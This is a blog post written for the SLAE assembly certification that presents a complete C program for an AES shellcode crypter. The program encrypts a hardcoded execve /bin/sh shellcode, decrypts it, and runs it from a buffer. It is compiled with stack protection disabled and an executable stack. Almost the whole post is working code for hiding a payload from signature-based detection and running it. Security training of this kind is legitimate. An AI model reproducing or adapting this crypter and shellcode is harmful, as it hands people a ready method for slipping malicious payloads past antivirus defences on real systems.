Art of Shellcoding: Basic AES Shellcode Crypter
In this post, we will design a shellcode crypter which will encrypt the shellcode and then decrypt the encrypted shellcode and run it dynamically. The libraries we will be using for encryption will be mcrypt, and the shellcode encryption schema is Rijndael-128(AES).
We will design the crypter in C programming language. The shellcode we will be using for this exercise will be an execve stack based shellcode. Following is the code of the crypter:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Compile using the following command: | |
| $gcc aes_128_crypter.c -o aes_128_crypter -lmcrypt -fno-stack-protector -z execstack | |
| Author: Nipun Jaswal (SLAE-1080) | |
| */ | |
| #include <stdio.h> | |
| #include <string.h> | |
| #include <mcrypt.h> | |
| int main() | |
| { | |
| // Shellcode execve-stack | |
| unsigned char * shellcode = \ | |
| "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" | |
| "\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89" | |
| "\xe1\xb0\x0b\xcd\x80"; | |
| int shell_len = strlen(shellcode); | |
| // Other Variables | |
| char* i_vect = "AAAABBBBCCCCDDDD"; | |
| char *key = "wh4t1sloven0t1ng"; | |
| unsigned char buffer[32]; | |
| int count; | |
| // Printing Unencrypted Shellcode | |
| printf("\n[+] Shellcode Used:\n"); | |
| for ( count = 0; count < shell_len; count++) | |
| { | |
| printf("\\x%02x",shellcode[count]); | |
| } | |
| //Copy Shellcode on a 32 Byte Buffer | |
| strncpy(buffer, shellcode, 32); | |
| //Calling Encryption Function with Flag=0 , 32 is Length, 16 is Key Size | |
| enc_dec(buffer, 32, i_vect, key,0); | |
| //Printing Out Encrypted Shellcode Bytes | |
| printf("\n\n[+] Encrypted Shellcode:\n"); | |
| for ( count = 0; count < 32; count++) | |
| { | |
| printf("\\x%02x",buffer[count]); | |
| } | |
| //Calling Decryption Function with Flag=1, 32 is the Length, 16 is Key Size | |
| enc_dec(buffer, 32, i_vect, key,1); | |
| //Printing Out Decrypted Shellcode Bytes | |
| printf("\n\n[+] Decrypted Shellcode:\n"); | |
| for(count = 0; count < shell_len; count++) | |
| { | |
| printf("\\x%02x",buffer[count]); | |
| } | |
| //Calling Shellcode | |
| printf("\n\nShellcode Length: %d\n", strlen(buffer)); | |
| int (*ret)() = (int(*)())buffer; | |
| ret(); | |
| return 0; | |
| } | |
| // Encryption Function | |
| int enc_dec(void* buffer,int buffer_len,char* i_vect, char* key, int flag) | |
| { | |
| // Mcrypt Object and Selecting the Crypto | |
| MCRYPT obj = mcrypt_module_open("rijndael-128", NULL, "cbc", NULL); | |
| mcrypt_generic_init(obj, key, 16, i_vect); | |
| if(flag==0) | |
| { | |
| printf("\n\n[+]Running Encryption..."); | |
| //Encrypting the Shellcode | |
| mcrypt_generic(obj, buffer, buffer_len); | |
| } | |
| else if(flag==1) | |
| { | |
| printf("\n\n[+]Running Decryption..."); | |
| //Decrypting the Shellcode | |
| mdecrypt_generic(obj, buffer, buffer_len); | |
| } | |
| mcrypt_generic_deinit (obj); | |
| mcrypt_module_close(obj); | |
| return 0; | |
| } |
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student-ID: SLAE-1080
Student-ID: SLAE-1080
No comments: